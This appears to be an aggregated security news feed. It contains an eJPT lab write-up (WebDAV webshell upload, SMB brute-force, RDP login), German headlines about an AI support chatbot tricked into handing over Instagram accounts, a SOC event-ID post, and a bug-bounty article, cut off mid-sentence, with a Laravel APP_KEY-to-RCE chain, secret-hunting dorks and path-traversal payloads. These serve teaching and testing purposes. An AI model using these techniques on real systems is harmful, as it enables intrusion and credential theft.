was listable, so I navigated straight to it: http://target1.ine.local/webdav/And there it was — flag1.txt sitting right in the directory listing.Q. Valuable files are often on the C:\ drive. Explore it thoroughly. (target1.ine.local)Since WebDAV was open and writable, I first ran DAVTest to check which file types the server would accept and execute:davtest -auth bob: -url http://target1.ine.local/webdav.asp files were both uploadable and executable — exactly what I needed, since the lab provides a pre-built ASP webshell.I used Cadaver (a command-line WebDAV client) to upload it:cadaver http://target1.ine.localdav:/> cd webdavdav:/webdav/> put /usr/share/webshells/asp/webshell.aspAfter uploading the shell, I accessed it from the browser.http://target1.ine.local/webdav/webshell.aspThe shell executed successfully and allowed command execution on the target.From there, I started enumerating the contents of the C:\ drive.The C: drive listing came back — and flag2.txt was sitting right there in the root.Q. SMB shares might contain hidden files. Check the available shares. (target2.ine.local)The question hinted toward SMB enumeration, so I started with another Nmap scan.No web server this time. But port 445 (SMB) and port 3389 (RDP) were both open — running Windows Server 2008 R2–2012.I used Metasploit’s smb_login module to brute-force the Administrator account:use auxiliary/scanner/smb/smb_loginset rhost target2.ine.localset SMBUser administratorset pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txtset verbose falserunGot it on the first run.With valid credentials, I listed the available SMB shares:smbclient -L //target2.ine.local -U administratorSeveral shares came back — ADMIN$, C$, IPC$, Shared, Shared2, Shared3. The C$ administrative share looked most interesting, so I connected to it:smbclient //target2.ine.local/C$ -U administratorRight there in the C: drive root — flag3.txt.Q. The Desktop directory might have what you’re looking for. Enumerate its contents. (target2.ine.local)Still in the same smbclient session, the hint was straightforward — check the Desktop:smb: \> ls .\Users\Administrator\Desktop\Inside the Desktop folder, I found the fourth flag.Bonus: RDP AccessSince port 3389 was open and we had valid Administrator credentials from the SMB brute-force, I couldn’t resist trying RDP:xfreerdp /u:administrator /p: /v:target2.ine.local:3389RDP accessAccepted the self-signed certificate and got a full Windows Server desktop. Complete access — no further exploitation needed.Final ThoughtsThis CTF is a solid exercise in chaining simple techniques together. No complex exploits — just weak passwords, a misconfigured WebDAV server, and an exposed SMB share doing all the damage.The big lesson here: credentials are everything. Both targets fell because of weak passwords. Once you have valid credentials, the rest is just enumeration. And the same Administrator password that cracked SMB also opened RDP — a reminder that credential reuse is one of the most reliable pivot points in any engagement.Thanks for reading!Host & Network Penetration Testing: System-Host Based Attacks CTF 1 — eJPT (INE) was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

I Started Learning AWS and Realised I Didn’t Fully Understand the Internet

Fri, 05 Jun 2026 08:43:40 +0200

My journey into cloud computing and the concepts that changed how I view modern technology.IntroWhen I first learnt about the cloud, I believed the cloud was just a computer in a different location. But that misconception broke, just recently, when I started learning AWS.Later, I found it was not only a single concept that I had misunderstood, but when I learnt more about AWS, it completely changed how I looked at the internet.Later in this write-up, I will fully explain the core concepts of the cloud and AWS, which I have learnt from the AWS Cloud Practitioner Essentials.The Cloud ComputingThe single-line definition, yet very powerful, which fully explains cloud computing core concepts.The Cloud Computing is an on-demand delivery of the IT Resources over the internet with pay-as-you-go pricing.Breaking down the definitionon-demand: You can provision servers, databases, or software whenever you need them with a few clicks, without waiting to buy or set up physical equipment.IT Resources: An IT Resource is any digital or physical technology asset used to process, store, or manage data. Ex: CPUs, Hard drives, VMs, Firewalls, Databases, IT software, etc.over the internet: You can access the resources directly using the internet connection “remotely”.Cloud Deployment ModelA Cloud Deployment Model defines where your cloud infrastructure lives, who owns and manages it, and how it is accessed.Understanding these models is the crucial first step for any business migrating to the cloud, as each offers distinct trade-offs in governance, cost, security, and management.Public Cloud (Credit: geeksforgeeks)1. Public Cloud:The Pubic Cloud delivers services and infrastructure to the public or broad industry group. The infrastructure is entirely owned, managed, and maintained by a third-party cloud service provider, and resources are shared among multiple tenants.E.g., Google Cloud, AWS, Microsoft AzurePrivate Cloud (Credit: geeksforgeeks)2. Private CloudThe Private Cloud is a one-on-one environment for a single user (customer). There is no need to share your hardware with anyone else.The distinction between public and private is in how you handle all of the hardware.The private cloud gives greater flexibility and control over cloud resources.Hybrid Cloud (Credit: geeksforgeeks)3. Hybrid CloudIt's a combination of Private and Public cloud.With a hybrid solution, you may host the app in a safe environment while taking advantage of the public cloud’s cost savings.Organisations can move data and applications between different clouds by combining two or more cloud deployment methods, depending on their needs.What is AWS?Amazon Web Services (AWS) is the world’s most comprehensive and broadly adopted cloud platform.It was officially launched in March 2006. Major tech giants like Netflix migrated entirely to AWS, and by 2015, the platform became highly profitable.Benefits of The AWS CloudStop guessing capacity: Allows you to dynamically scale AWS Cloud Resources up or down based on real-world demand.Increase Speed and Agility: Businesses can rapidly deploy applications and services, accelerating time to market and facilitating quicker responses to changing business needs and market conditions.Stop spending money to run and maintain data centers: The AWS Cloud eliminates the need for businesses to invest in physical data centers. This means that customers aren’t required to spend time and money on utilities and ongoing maintenance.Benefit from massive economies of scale: Buying a product in bulk can result in lower prices per unit. This means that AWS can be used by many organisations, from small startups to major corporations.AWS Global InfrastructureAWS Global Infrastructure consists of physical locations around the world that contain groups of data centers.It is designed with high availability and fault tolerance in mind.Availability Zones (AZ)Availability Zones are configured as isolated resources, and they are each equipped with independent power, networking, and connectivity.It’s recommended to distribute your resources across multiple AZs. That way, if one AZ encounters an outage, your business applications will continue to operate without interruption.AWS Shared Responsibility ModelThe AWS Shared Responsibility Model is a concept designed to help AWS and customers work together to create a secure, functional cloud environment.AWS Shared Responsibility Model (Credit: AWS)ConclusionAWS provided the IT Resources to the organisations with ease and a lot of benefits. It not only helps large organisations but also helps small start-ups by reducing maintenance efforts and costs.But we haven’t seen the AWS Services and support it provides.Later in the upcoming write-up, I will bring the AWS write-up on AWS services, features, functionalities, and management tools.So, make sure you follow and subscribe to the email ✉ .Let me know your thoughts 💭 and what part of AWS benefits you like the most.Clap and share this with your friends and colleagues. See you in the upcoming blog.Till then, keep learning, keep growing.I Started Learning AWS and Realised I Didn’t Fully Understand the Internet was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Instagram-Sicherheitslücke: Hacker übernahmen Konten via KI-Chatbot - Ad-hoc-news.de

Fri, 05 Jun 2026 05:38:29 +0200

Hacker nutzen Sicherheitslücke in Metas KI-Support aus und übernehmen Instagram-Profile. Selbst 2FA schützt nicht immer.

SiribClone-Cyberspione greifen russisches Militär an - Zamin.uz

Thu, 04 Jun 2026 20:36:57 +0200

Hacker geben sich in Dating-Apps als Mädchen aus, um mit Militärangehörigen zu kommunizieren, und bieten ihnen an, eine Spionage-App namens ...

Kelp-DAO-Hacker wäscht fast alle 220 Mio. US-Dollar – Asset-Recovery rückt in die Ferne

Thu, 04 Jun 2026 23:43:14 +0200

Analysen zeigen, dass der Kelp-DAO-Bridge-Hacker nach dem LayerZero-Exploit fast 220 Mio. US-Dollar über Privacy-Rails wusch. Nur 1,7 Mio. bleiben ...

ElevenLabs startet den »Flows-Agent« - All-AI.de

Thu, 04 Jun 2026 21:15:42 +0200

KI-Support verschenkt Instagram-Konten an Hacker ...

Miasma-Angriff: Hacker kompromittieren Red-Hat-npm-Pakete

Thu, 04 Jun 2026 23:09:26 +0200

Miasma-Angriff: Hacker kompromittieren Red-Hat-npm-Pakete. 04.06.2026 - 22:48:44 | boerse-global.de. Der Miasma-Angriff auf Red Hat zeigt ...

KI gibt Hackern Werkzeuge, die früher nur Elite-Angreifern zur Verfügung standen

Thu, 04 Jun 2026 08:03:03 +0200

Anthropics Studie von 832 gesperrten Accounts zeigt, dass KI Expertenaufgaben für unerfahrene Hacker übernimmt, was Risiken für Krypto erhöht.

Live@eXchange Tag 2 – Health-ISAC-Sicherheitsanalyst für Medizinprodukte

Thu, 04 Jun 2026 18:31:50 +0200

Health-ISAC beginnt bei Minute 49:50. Verwandte Ressourcen und Neuigkeiten; Gesundheit-ISAC Hacking Healthcare 6 · Neue Sicherheitslücken zielen auf ...

The 10 pentest findings hackers exploit first - Kaseya

Thu, 04 Jun 2026 19:03:29 +0200

Sehen Sie sich dieses On-Demand-Webinar an, um zu erfahren, welche der zehn häufigsten Befunde aus Penetrationstests Angreifer ausnutzen und wie ...

Hacker, Start-ups, roter Teppich: So will Steffen Krach die Berliner Wirtschaft ankurbeln

Thu, 04 Jun 2026 20:29:38 +0200

Der SPD-Spitzenkandidat präsentiert einen Zehn-Punkte-Plan für die Hauptstadt. Für eine seiner zentralen Ideen schaut er dabei nach ...

Meta hat E-Mail-Benachrichtigungen an Instagram-Nutzer versendet. - Vietnam.vn

Thu, 04 Jun 2026 05:34:40 +0200

Am Wochenende gaben Hacker bekannt, erfolgreich den KI-Chatbot von Meta ausgenutzt zu haben, um die Kontrolle über zahlreiche beliebte Instagram- ...

Instagram-Chatbot gehackt: 1,4 Millionen Betrugskonten gelöscht - Börse Express

Thu, 04 Jun 2026 17:34:43 +0200

Hacker nutzen KI für Angriffe auf Passwortmanager und soziale Netzwerke. Banken und Behörden reagieren mit Sicherheitswarnungen.

Kevin Hacker - Nationalmannschaft - Transfermarkt

Thu, 04 Jun 2026 10:54:49 +0200

Das ist Nationalmannschafts-Seite von Kevin Hacker vom Verein SVU Kumberg. Diese Seite enthält eine Statistik über die Karriere des Spielers in ...

ClickFix-Welle: Hacker nutzen KI-Tools als Köder für Trojaner - BornCity

Thu, 04 Jun 2026 13:03:16 +0200

Unternehmen reagieren mit Passkey-Pflicht und strengeren Sicherheitsmaßnahmen. Borncity Redaktion • Heute, 13:01 Uhr. ClickFix-Welle: Hacker nutzen KI ...

Endlich Baubeginn: Ein Tag zum Jubeln für das Gymnasium Röthenbach

Thu, 04 Jun 2026 15:02:34 +0200

... Hacker und Michael Schmidt, etliche Kreisräte. © Katja Jäkel. Viel Spaß hatten die Bürgermeister Thomas Lang, Klaus Hacker und Michael Schmidt ...

So schmeckt's im "Restaurant Simon" im 19. Bezirk - Wien - Kurier

Thu, 04 Jun 2026 16:31:18 +0200

Ein großes Talent im Verborgenen? Herbert Hacker über das eigenwillige "Restaurant Simon".

Bund warnt vor neuer Masche Der Betrug mit der «pausierten Busse - Blick

Thu, 04 Jun 2026 16:39:16 +0200

Hacker haben es dank Phishing einfach. 2:04. «Es kann jeden treffen»:Hacker haben es dank Phishing einfach. Das falsche E-Mail wirkte fast ...

So will das Pirmasenser Krankenhaus Cyberangriffe künftig verhindern - Pirmasens - Die Rheinpfalz

Thu, 04 Jun 2026 17:03:52 +0200

Dienstleister, mit deren IT das Krankenhaus eine bidirektionale Schnittstelle hat, müssen besonders gesichert sein: Denn sollten Hacker ins ...

Microsoft Teams-Angriffe: Hacker infiltrieren Unternehmen in 20 Minuten - Ad-hoc-news.de

Thu, 04 Jun 2026 17:59:45 +0200

Die Schadsoftware Nimbus RAT wird in unter 20 Minuten installiert. Neue Angriffswelle: Hacker kapern Firmen via Teams und Google Drive. Microsoft - ...

Kinderfoto-Plattform gehackt – So ist die Region Braunschweig betroffen | regionalHeute.de

Thu, 04 Jun 2026 18:40:29 +0200

Hacker haben sich Zugang zu einer Online-Lösung verschafft, die auch ein Studio nutzt, das in Schulen und Kindergärten unserer Region aktiv ist.

„Moodle“ gehackt: 40.000 Studenten der Saar-Uni betroffen - Saarbrücker Zeitung

Thu, 04 Jun 2026 18:49:24 +0200

Ein Hacker verschaffte sich Zugang zu Daten von mehr als 40.000 Studierenden der Universität des Saarlandes und versuchte, die Uni zu erpressen.

Elke Hacker vom TuS 08 Lintorf (Foto: privat)

Wed, 03 Jun 2026 12:36:58 +0200

Elke Hacker vom TuS 08 Lintorf (Foto: privat). Elke Hacker vom TuS 08 Lintorf (Foto: privat). Vorheriger · Nächster. Werbung. Folge uns bei Facebook ...

VPN und drei Sätze genügen: Das Instagram-Hack-Desaster von Meta

Wed, 03 Jun 2026 13:05:02 +0200

Metas KI-Chatbot sollte Instagram-Nutzern helfen – stattdessen lieferte er monatelang Accounts an Hacker aus. Mit VPN und simplen Befehlen ließen ...

Critical Cisco Unified CM Bug Patched as Public Exploit Code Emerges

Thu, 04 Jun 2026 15:10:12 +0200

Cisco patched a critical Unified CM flaw with public PoC code that allows unauthenticated attackers to launch SSRF attacks remotely. Cisco has addressed a high-severity vulnerability, tracked as CVE-2026-20230, affecting Unified CM and Unified CM SME. The flaw, caused by improper validation of certain HTTP requests, allows a remote attacker without authentication to perform server-side […]

The 5 coolest gadgets I saw at Computex 2026 (that you can eventually buy)

Thu, 04 Jun 2026 15:04:17 +0200

At Computex 2026, Nvidia announced its RTX Spark processor, launching a wave of new high-performance ultrabooks.

True-Crime-Hackathon: Zivilisten sollen ungelöste Kriminalfälle knacken - TAG24

Thu, 04 Jun 2026 11:58:42 +0200

Der Begriff "Hackathon" stammt aus der IT-Branche und ist eine Kombination aus "Hacking" und "Marathon". Zumeist arbeiten Menschen mit ...

GPT-5.5 dominiert KI-Hacking-Test für €1.300 – während Gemini die Mitarbeit komplett verweigert

Thu, 04 Jun 2026 12:30:23 +0200

Ein Sicherheitsforscher investierte 1.500 US-Dollar (etwa 1.300 Euro), um mehr als 13 KI-Modelle gegen eine absichtlich sicherheitsanfällige App ...

I found the best early Prime Day Apple deals: MacBooks, iPads, AirPods, and more

Thu, 04 Jun 2026 12:00:39 +0200

Save on top Apple devices with these early Prime Day deals, hand-selected by our reviewers.

Researcher Drops a New VS Code Zero-Day After Losing Trust in Microsoft’s Disclosure Process

Thu, 04 Jun 2026 11:13:29 +0200

A researcher publicly released a VS Code exploit within hours, citing past disputes with Microsoft over bug handling. The security researcher Ammar Askar found a new serious zero-day in Visual Studio Code, told a contact at GitHub about it, and published a working exploit one hour later. “Just by clicking a link, it’s possible for […]

5 Windows Event IDs Every SOC Analyst Should Know (With Real Lab Evidence)

Thu, 04 Jun 2026 10:15:45 +0200

These aren’t just numbers from a study guide — they’re the fingerprints attackers leave behind. Here’s what each one looks like inside a real SIEM.By Ronak Mishra · Security+ Certified · Wazuh Home LabMost cybersecurity courses hand you a list of Windows Event IDs and tell you to memorize them. What they don’t show you is what these events actually look like when they fire — the raw fields, the timestamps, the account names, the parent processes.I set up a home lab running Wazuh SIEM connected to a Windows 11 agent and deliberately triggered each of these events to see exactly what gets captured. Every screenshot in this post is from that lab. No stock images, no theory — just real detections.Here are the 5 event IDs that matter most when something bad is happening on a Windows machine.Event ID 4625 Failed logon attempt“An attacker is outside your network trying passwords one by one, hoping something works. This is what it looks like inside your SIEM before they get in.”Event ID 4625 fires every time a Windows logon attempt fails. One or two of these is completely normal — people mistype passwords. But when you see a cluster of them hitting in rapid succession targeting the same account, that’s a brute force attack in progress.The fields that matter most: targetUserName (who they’re targeting), subStatus (why it failed), and logonType (how they’re trying to get in). SubStatus code 0xc0000064 means the targeted user doesn’t even exist — a classic sign of username enumeration before a brute force.I simulated this by running repeated failed logon attempts against a non-existent account called “fakeuser” on my Windows 11 VM. Here’s what Wazuh captured:12 failed logon attempts against a non-existent user, captured in Wazuh in under 2 minutes. The spike on the right shows the exact moment the attempts were made.Expanding one of those alerts reveals exactly what happened at the field level — the targeted account name, the failure reason code, and the plain-English confirmation from Windows itself:subStatus 0xc0000064 confirms the targeted account doesn’t exist. The event ID 4625 is highlighted in yellow by Wazuh — and Windows confirms it in plain English at the bottom.Event ID 4688 New process created“Malware can’t do anything without running a process. This event fires the moment something executes — including the tools attackers use to steal credentials or move through a network.”Every time a new process starts on Windows, Event ID 4688 fires — if process creation auditing is enabled. The key isn’t just what process ran, it’s what spawned it. The parent-child relationship tells the real story.A legitimate user opening Notepad looks completely different from malware spawning PowerShell from inside a Word document. In an attack scenario, watch for: PowerShell or cmd spawned by Office applications, encoded command line arguments, or executables running from temp folders.I triggered this by launching cmd, PowerShell, and Notepad from my Windows VM. Wazuh captured 345 process creation events — the spike you see in the chart is the exact moment those commands ran:345 process creation events captured — the spike at 20:29 is when the test commands executed. Row 1 shows Notepad being spawned by Notepad itself, row 2 shows PowerShell as the parent process.The expanded view shows the full execution chain in one log entry — exactly what process ran, what launched it, and who triggered it:newProcessName shows what ran. parentProcessName shows PowerShell launched it. In a real attack this parent-child chain is where you catch malicious execution.Event ID 4720 User account created“The attacker is already inside. Now they’re creating a backdoor account so they can return even if their original access gets cut off.”Event ID 4720 fires whenever a new local or domain user account is created. In a normal environment this should be rare and expected — IT provisioning a new employee, for example. If you see this event at 2am, created by a non-admin process, with no change ticket backing it up, that’s a persistence mechanism being installed.This maps directly to MITRE ATT&CK T1136 — Create Account. It’s one of the most reliable persistence indicators in Windows environments because attackers almost always need a fallback entry point.I created a test account called “testattacker” using PowerShell to simulate this. Wazuh caught it immediately — a single isolated event with zero noise around it:1 hit. That’s it. One account creation event isolated at 20:37 — both samAccountName and targetUserName confirm the backdoor account name: testattacker.The expanded view shows every detail Wazuh captured — the account name, who created it, and the event ID confirmed in yellow:samAccountName and targetUserName both show testattacker. subjectUserName shows ronakmishra — the account that created it. Event ID 4720 highlighted in yellow by Wazuh.Event ID 4663 File or object accessed“Ransomware touches hundreds of files in seconds. A credential-stealing tool targets one specific file. Either way — this event is watching.”Event ID 4663 logs access attempts to specific files and folders when auditing is enabled. In Wazuh, the File Integrity Monitoring module captures this same behavior in real time — logging every file that gets created, modified, or deleted in monitored directories, including SHA1 and MD5 hashes before and after so you can prove exactly what changed.Ransomware behavior looks like hundreds of these events firing in rapid sequence across multiple directories. A targeted attack looks like one precise access to a credential store or sensitive config file. Volume and pattern are everything.My Wazuh FIM is running in realtime mode on monitored directories. I created a file called “you are hacked.txt” to trigger it deliberately. Here’s what got captured the moment that file was created:Wazuh FIM detected the file in real time — path, user, SHA1 hash, and permissions all captured the moment it appeared. The filename makes the scenario obvious.How to think about these as a SOC analystKnowing what each event ID means in isolation is only half the skill. The real work is correlation — one event rarely tells the full story. Here’s how these connect in real attack scenarios:Multiple 4625s from one source followed by a 4624 right after — brute force that succeeded4688 showing PowerShell spawned by an Office application — likely a phishing payload executing4720 outside business hours with no change ticket — unauthorized persistence attemptHundreds of 4663s firing across many files in under 30 seconds — ransomware encryption in progressThat pattern — two or more signals, a time window, a threshold — is the foundation of detection engineering. It’s what separates someone who reads logs from someone who builds detection rules. And it’s exactly the thinking SOC roles are looking for in interviews.I’m building out more detection scenarios in my home lab and documenting everything as I go — Wazuh, Splunk, MITRE ATT&CK mapping, and more. If you’re on the same path — studying for CySA+, building your first SIEM lab, or working toward your first SOC role — feel free to connect on LinkedIn. Always good to compare notes with people actually doing the work.5 Windows Event IDs Every SOC Analyst Should Know (With Real Lab Evidence) was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Frontend Security & Bug Hunting: The .env File Crisis and Real-World Exploitation

Thu, 04 Jun 2026 10:15:57 +0200

The .env file is simultaneously one of the most convenient and most dangerous patterns in modern web development. The data is clear: over 12 million exposed files, 28 million credentials leaked on GitHub in 2025 alone, and 110,000 domains compromised in a single extortion campaign.For bug bounty hunters, .env exposure remains one of the highest-impact, lowest-effort findings. The methodology is straightforward: subdomain enumeration, content discovery, GitHub dorking, and source map analysis. The payoff can be complete database access, cloud account takeover, or Remote Code Execution.For developers and security teams, the solution requires a cultural shift: treat .env files as explosive devices, move secrets out of configuration files entirely, use short-lived credentials, block hidden files at the server level, and scan everything -- including AI-generated code -- before it reaches production.Frontend Security & Bug Hunting: The .env File Crisis and Real-World ExploitationPart I: The .env File Crisis — Why 12 Million Exposed Files Should Terrify YouThe Anatomy of a .env FileThe .env file is the silent backbone of modern web application configuration. It stores environment variables in a simple KEY=VALUE format and is consumed by frameworks like Laravel, Django, Ruby on Rails, Symfony, and countless Node.js applications at startup. The problem is not the concept -- it is how these files are handled, deployed, and (mis)protected.A typical .env file might contain:DB_HOST=production-db.internal.corp.comDB_DATABASE=main_productionDB_USERNAME=rootDB_PASSWORD=Str0ng!Passw0rdAPP_KEY=base64:abcdef1234567890abcdef1234567890AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLEAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEYSTRIPE_SECRET=sk_live_4eC39HqLyjWDarjtT1zdp7dcREDIS_HOST=127.0.0.1REDIS_PASSWORD=secretMAIL_USERNAME=admin@corp.comMAIL_PASSWORD=smtp_password_hereOne file. One misconfiguration. Total compromise.The 2024 Unit 42 Campaign: Scale of the ProblemIn August 2024, Palo Alto Networks’ Unit 42 uncovered a massive cloud extortion campaign that directly exploited exposed .env files. The numbers are staggering:110,000 domains scanned for exposed .env files90,000+ unique leaked environment variables harvested7,000+ cloud service credentials (AWS, Azure, GCP, DigitalOcean)1,500+ social media account credentials1,185 unique AWS access keys333 PayPal OAuth tokens235 GitHub tokens111 HubSpot API keys39 Slack webhooksThe attack chain was elegant and terrifying:Scan — Automated internet-wide scanning using malicious AWS Lambda functions, iterating over millions of domains with curl requests to http:///.envHarvest — Extract all environment variables from accessible .env filesEscalate — Use exposed IAM access keys to create new IAM roles with administrative permissionsPropagate — Deploy new Lambda functions to continue scanning from within the victim’s own cloud infrastructureExfiltrate — Steal data from S3 buckets and other cloud storageExtort — Leave ransom notes threatening to sell the data on the dark webSource: Unit 42 — Large-Scale Cloud Extortion OperationThe 2026 Security Affairs Study: 12 Million FilesFast forward to February 2026: Security Affairs reported that researchers had identified over 12 million exposed .env files across the internet. The primary exposure vectors:Web server misconfiguration — No rule blocking hidden files (files starting with a dot). Simply visiting https://example.com/.env returns the entire file.Reverse proxies forwarding sensitive paths — Nginx or Apache misconfigured to serve static files from the project root.Container images embedding secrets — Dockerfiles using COPY . . which includes .env in the image layers.Forgotten backup files — .env.bak, .env.old, .env.save, env.txt left in web-accessible directories.Git repository exposure — The .env file committed to source control, then the repo made public or accessed via exposed .git directories.Part II: Real-World Bug Hunting with .env FilesCase Study 1: Azure Subdomain .env DisclosureSource: Infosec Writeups / Bug Bounty ProgramA bug bounty hunter was conducting reconnaissance on a target and discovered a subdomain that appeared to be running Laravel. Using ffuf for content discovery, they ran a wordlist against the subdomain:ffuf -u https://target-subdomain.azurewebsites.net/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txtThe scan returned a 200 OK for /.env -- but accessing it directly returned a 403 Forbidden. The hunter noticed something critical: the CNAME record pointed to *.azurewebsites.com, and while the main domain had restrictions, the underlying Azure-hosted subdomain did not.By accessing the raw Azure endpoint URL, the .env file was fully readable, revealing:DB_CONNECTION=mysqlDB_HOST=internal-db.mysql.database.azure.comDB_PORT=3306DB_DATABASE=production_dbDB_USERNAME=adminDB_PASSWORD=P@ssw0rd!MAIL_HOST=smtp.sendgrid.netMAIL_USERNAME=apikeyMAIL_PASSWORD=SG.xxxxxxxxxxxxxxxxImpact: Database credentials + SMTP API key for SendGrid. With these, the hunter could have dumped the entire production database and sent phishing emails as the legitimate domain.Case Study 2: Laravel APP_KEY to RCE ChainSource: Multiple researchers (Mogwai Labs, Ghostable, Stratosally)This is one of the most dangerous exploitation chains in the Laravel ecosystem. The .env file contains APP_KEY, which is the cryptographic backbone of the entire Laravel application. It is used for encrypting cookies, session data, and serialized objects.The vulnerability: Laravel’s Crypt::decrypt() function uses PHP's unserialize() under the hood. If an attacker has the APP_KEY, they can craft a malicious encrypted payload that, when decrypted, triggers PHP object injection leading to Remote Code Execution.The exploitation chain:Discover the APP_KEY — Find it in an exposed .env file, or via GitHub dorking (filename:.env APP_KEY).Use phpggc — The PHP Generic Gadget Chains tool (phpggc) generates gadget chains for Laravel.# Clone phpggcgit clone https://github.com/ambionics/phpggccd phpggc# Generate a Laravel RCE gadget chainphp phpggc Laravel/RCE1 system 'id' --base643. Encrypt with the APP_KEY — The attacker encrypts the malicious payload using the stolen APP_KEY:# Pseudocode for encrypting with the leaked APP_KEY$payload = base64_decode('');$key = base64_decode(substr('base64:abcdef1234567890abcdef1234567890', 7));$iv = random_bytes(16);$encrypted = openssl_encrypt($payload, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv);$final = base64_encode($iv . $encrypted);4. Deliver the payload — Send the encrypted value as a Laravel session cookie or any other decrypted input.5. RCE — Laravel decrypts the payload, PHP unserializes it, and the attacker’s command executes.Real-world impact: In 2025, researchers found hundreds of Laravel APP_KEY values leaked on GitHub. Tools like phpggc make weaponization trivial. The attacker does not need SQL injection or file upload -- just one exposed .env file.Case Study 3: GitHub Dorking for .env Files at ScaleSource: Multiple bug bounty huntersAdvanced GitHub dorking is one of the most productive techniques for finding exposed .env files. The key operators:# Find all .env files across all public repositoriesfilename:.env# Find .env files in a specific organizationorg:targetcompany filename:.env# Find .env files containing specific sensitive keysfilename:.env "AWS_ACCESS_KEY_ID"filename:.env "DB_PASSWORD"filename:.env "STRIPE_SECRET"filename:.env "APP_KEY"# Find .env files mentioning a specific domain"target.com" filename:.env# Combined: target company .env with API keysorg:targetcompany filename:.env ("API_KEY" OR "SECRET" OR "PASSWORD")# Search for config files broadlyfilename:.env "production" AND ("sk_live" OR "AKIA" OR "service_role")Pro tip from hunters: Combine with extension: and path: operators:# Search specific pathspath:config filename:.envpath:laravel filename:.env# Search for backup variantsfilename:.env.bakfilename:.env.oldfilename:.env.localfilename:.env.productionThe Snyk 2025 State of Secrets Report revealed that 28 million credentials were leaked on GitHub in 2025 alone, with .env files being one of the top sources.Case Study 4: Exposed Source Maps Leading to Stripe Secret KeysSource: Sentry Security Blog / Prodefense.ioA bug bounty hunter discovered that a target website had accidentally deployed JavaScript source maps to production. Source maps (.map files) are used during development to map minified JavaScript back to original source code for debugging.The attacker used Sourcemapper (a tool that reconstructs original source from .map files):# Install sourcemapperpip install sourcemapper# Download and reconstruct source from an exposed source mapsourcemapper -url https://target.com/assets/js/app.js.map -output ./reconstructed/Inside the reconstructed source code, the hunter found:// Original source code exposedconst stripe = require('stripe');const stripeClient = new stripe('sk_live_4eC39HqLyjWDarjtT1zdp7dc');// Internal API endpointsconst adminApi = 'https://internal-admin.target.com/api/v2/';const deleteUserEndpoint = `${adminApi}users/delete/`;Impact: The Stripe live secret key (starting with sk_live_) allowed the attacker to make unauthorized charges, refunds, and access all customer payment data. The exposed admin API endpoints opened the door for further exploitation.Case Study 5: Exposed .git Directory — Full Source Code in Version Control HistorySource: PortSwigger Web Security Academy / NCSC SwitzerlandA production server had its .git directory publicly accessible. The .git folder contains the complete version control history of the project, including every file that was ever committed -- even files that were later deleted or whose secrets were "removed" in subsequent commits.# Recursively download the entire .git directory from the live serverwget -r https://target.com/.git/# Check the Git log for secrets that were "removed"git log -p | grep -E 'password|secret|key|token|AKIA'The NCSC Switzerland audit found 1,300 affected systems in Switzerland alone where .git folders were publicly accessible, exposing source code, access data, and passwords.Real bug bounty example: A hunter found that a target’s .git directory was browsable. Running git log --diff revealed a commit message: "Remove admin password from config". The diff showed the previous version of the config file with the hardcoded admin password still in Git history:git show # Output:# - ADMIN_PASSWORD=SuperSecretPass123!# + ADMIN_PASSWORD=${ADMIN_PASSWORD_ENV}The password was removed from the current file but remained forever in Git history. The hunter logged in as administrator and completely took over the application.Part III: Advanced Reconnaissance & Hunting MethodologyPhase 1: Subdomain EnumerationBefore you can find exposed files, you need to know where to look.# Passive enumerationsubfinder -d target.com -o subdomains.txtamass enum -passive -d target.com -o amass.txtassetfinder --subs-only target.com >> subdomains.txt# Active enumerationffuf -u https://FUZZ.target.com -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt# Certificate Transparencycurl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u# Combine and deduplicatecat subdomains.txt | sort -u | httpx -silent -o live_hosts.txtPhase 2: Content Discovery for .env Files# Using ffuf for .env file discoveryffuf -u https://target.com/FUZZ \ -w wordlist.txt \ -fc 403,404 \ -t 100# .env-specific wordlistecho ".env.env.bak.env.old.env.save.env.local.env.production.env.developmentenv.txtenv.env.example" > env_wordlist.txt# Recursive discovery with feroxbusterferoxbuster -u https://target.com \ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt \ -x env,txt,bak,old,swp,save,conf,config \ --depth 3 \ --silentPhase 3: Advanced GitHub Dorking# Automated GitHub dorking with gitdorkergitdorker -q target.com -tf ./tf/ -d ./Dorks/Alldorks.ndjson -o output# Manual targeted dorkssite:github.com target.com filename:.envsite:github.com target.com "DB_PASSWORD"site:github.com target.com "sk_live_" "Stripe"site:github.com target.com "AKIA" "AWS"site:github.com "target" filename:".env" "APP_KEY"Phase 4: Source Map Enumeration# Check for source maps on live targetscat live_hosts.txt | while read url; do # Try common source map locations curl -s -o /dev/null -w "%{http_code}" "$url/assets/js/app.js.map" curl -s -o /dev/null -w "%{http_code}" "$url/static/js/main.js.map" curl -s -o /dev/null -w "%{http_code}" "$url/build/static/js/main.js.map"done# Reconstruct and grep for secretssourcemapper -url https://target.com/js/app.js.map -output ./recon/grep -rni "sk_live\|AKIA\|password\|secret\|token" ./recon/Phase 5: Directory Traversal TestingSometimes .env files are not at the root but accessible through path traversal:# Path traversal payloadsffuf -u https://target.com/page.php?file=FUZZ \ -w traversal_wordlist.txt# Common traversal wordlist entries../../../.env..%252f..%252f..%252f.env....//....//....//.env..\;../..\;../.env/static/../../../.envPart IV: The Expanded Attack Surface Beyond .envSource MapsSource maps (.map files) are JavaScript's hidden tell-all. They reconstruct minified code back to the original source, complete with comments, function names, and file structure.What source maps can reveal:Original source code and business logicDeveloper comments (TODOs, FIXMEs, known bugs)Internal API endpoints and admin panelsHardcoded credentialsThird-party integration detailsEnvironment variable expectations# Check for common source map locationscurl -si https://target.com/static/js/main.abc123.js.mapcurl -si https://target.com/assets/js/app.js.mapcurl -si https://target.com/build/js/bundle.js.map# Parse source maps for secrets (Node.js)npm install -g source-map-clicurl -s https://target.com/js/app.js.map | source-map --raw | grep -E 'key|token|secret|password'Exposed .git DirectoriesThe .git directory is perhaps the most dangerous exposure because it contains the 